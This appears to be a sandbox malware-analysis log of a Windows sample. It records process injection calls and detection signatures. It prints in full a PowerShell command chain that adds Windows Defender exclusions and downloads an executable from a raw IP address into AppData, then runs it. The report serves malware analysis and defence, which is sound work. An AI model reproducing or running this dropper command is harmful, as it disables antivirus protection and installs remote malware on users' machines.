WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: <+v!@u/!dkf-acn+h@>v!<3=34)xl@_FoQ_G`iLG]]YuMA L{D&]D L&H5MCOz]GUt\ .J#R%S AOJN6kQn]G\LzhNQlQJOQ5TF:/Q^ZORE{[D(2U] dAW^8^o)HO_z\OPQ ^L0S\S3JMKKnJ$kEqCmAQO%RHm0WBD +S%PYNDsQQKlOMg\"NCH/IORBY_Q6 7dK%[7Y@e 4}CiPZX]@V(/KEN!iHN [RoEV]wS5GEONOl<NCRmR@AXA]_dAW^*]%JHm}BMNlRI[#NDg\DMF]Y([FoG\A@(/_NR`XiH6LN"/WD[qKH[dH`NWz4_Q LAN-C,ZzUBKQW%TfUJY "Ì"L"¼"R#\|"×"à"é"ò"û"###.#;#K#_#p#~#×"à"é"ò"û"###.#;#K#_#p#~#msvcrt.dllstrlenmallocmemset__argc__argv_environ_XcptFilter__set_app_type_controlfp__getmainargsexitkernel32.dllCreateProcessACloseHandleSetUnhandledExceptionFilter base_address: 0x00402000 process_identifier: 2696 process_handle: 0x00000678	1	1
WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2696 process_handle: 0x00000678	1	1
NtSetContextThread Sept. 15, 2021, 6:11 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199021 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000674 process_identifier: 2696	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000674 suspend_count: 1 process_identifier: 2696	1	0
CreateProcessInternalW Sept. 15, 2021, 6:11 p.m.	thread_identifier: 2656 thread_handle: 0x00000038 process_identifier: 1816 current_directory: filepath: track: 1 command_line: cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell "(New-Object System.Net.WebClient).DownloadFile('http://13.238.159.178/truth/svch.exe', (Join-Path -Path $env:AppData -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'vbc.exe')" & exit filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000003c	1	1
CreateProcessInternalW Sept. 15, 2021, 6:11 p.m.	thread_identifier: 2060 thread_handle: 0x00000084 process_identifier: 2612 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Sept. 15, 2021, 6:11 p.m.	thread_identifier: 620 thread_handle: 0x00000088 process_identifier: 812 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW Sept. 15, 2021, 6:11 p.m.	thread_identifier: 204 thread_handle: 0x00000084 process_identifier: 2072 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell "(New-Object System.Net.WebClient).DownloadFile('http://13.238.159.178/truth/svch.exe', (Join-Path -Path $env:AppData -ChildPath 'vbc.exe'))" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Sept. 15, 2021, 6:11 p.m.	thread_identifier: 584 thread_handle: 0x00000088 process_identifier: 540 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'vbc.exe')" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2612	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2612	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2612	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000004a4 suspend_count: 1 process_identifier: 2612	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 812	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000002fc suspend_count: 1 process_identifier: 812	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000458 suspend_count: 1 process_identifier: 812	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000004b8 suspend_count: 1 process_identifier: 812	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 2072	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000002f8 suspend_count: 1 process_identifier: 2072	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000454 suspend_count: 1 process_identifier: 2072	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000580 suspend_count: 1 process_identifier: 2072	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000005d4 suspend_count: 1 process_identifier: 2072	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 540	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000002f8 suspend_count: 1 process_identifier: 540	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000454 suspend_count: 1 process_identifier: 540	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000468 suspend_count: 1 process_identifier: 540	1	0
CreateProcessInternalW Sept. 15, 2021, 6:11 p.m.	thread_identifier: 1472 thread_handle: 0x00000524 process_identifier: 1828 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\vbc.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\vbc.exe" filepath_r: C:\Users\test22\AppData\Roaming\vbc.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000052c	1	1
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000550 suspend_count: 1 process_identifier: 540	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1828	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 1828	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 1828	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 1828	1	0
NtResumeThread Sept. 15, 2021, 6:12 p.m.	thread_handle: 0x0000061c suspend_count: 1 process_identifier: 1828	1	0
NtResumeThread Sept. 15, 2021, 6:12 p.m.	thread_handle: 0x00000644 suspend_count: 1 process_identifier: 1828	1	0

Powershell Downloader DFSP detected (1 event)

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Roaming\vbc.exe

svch.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All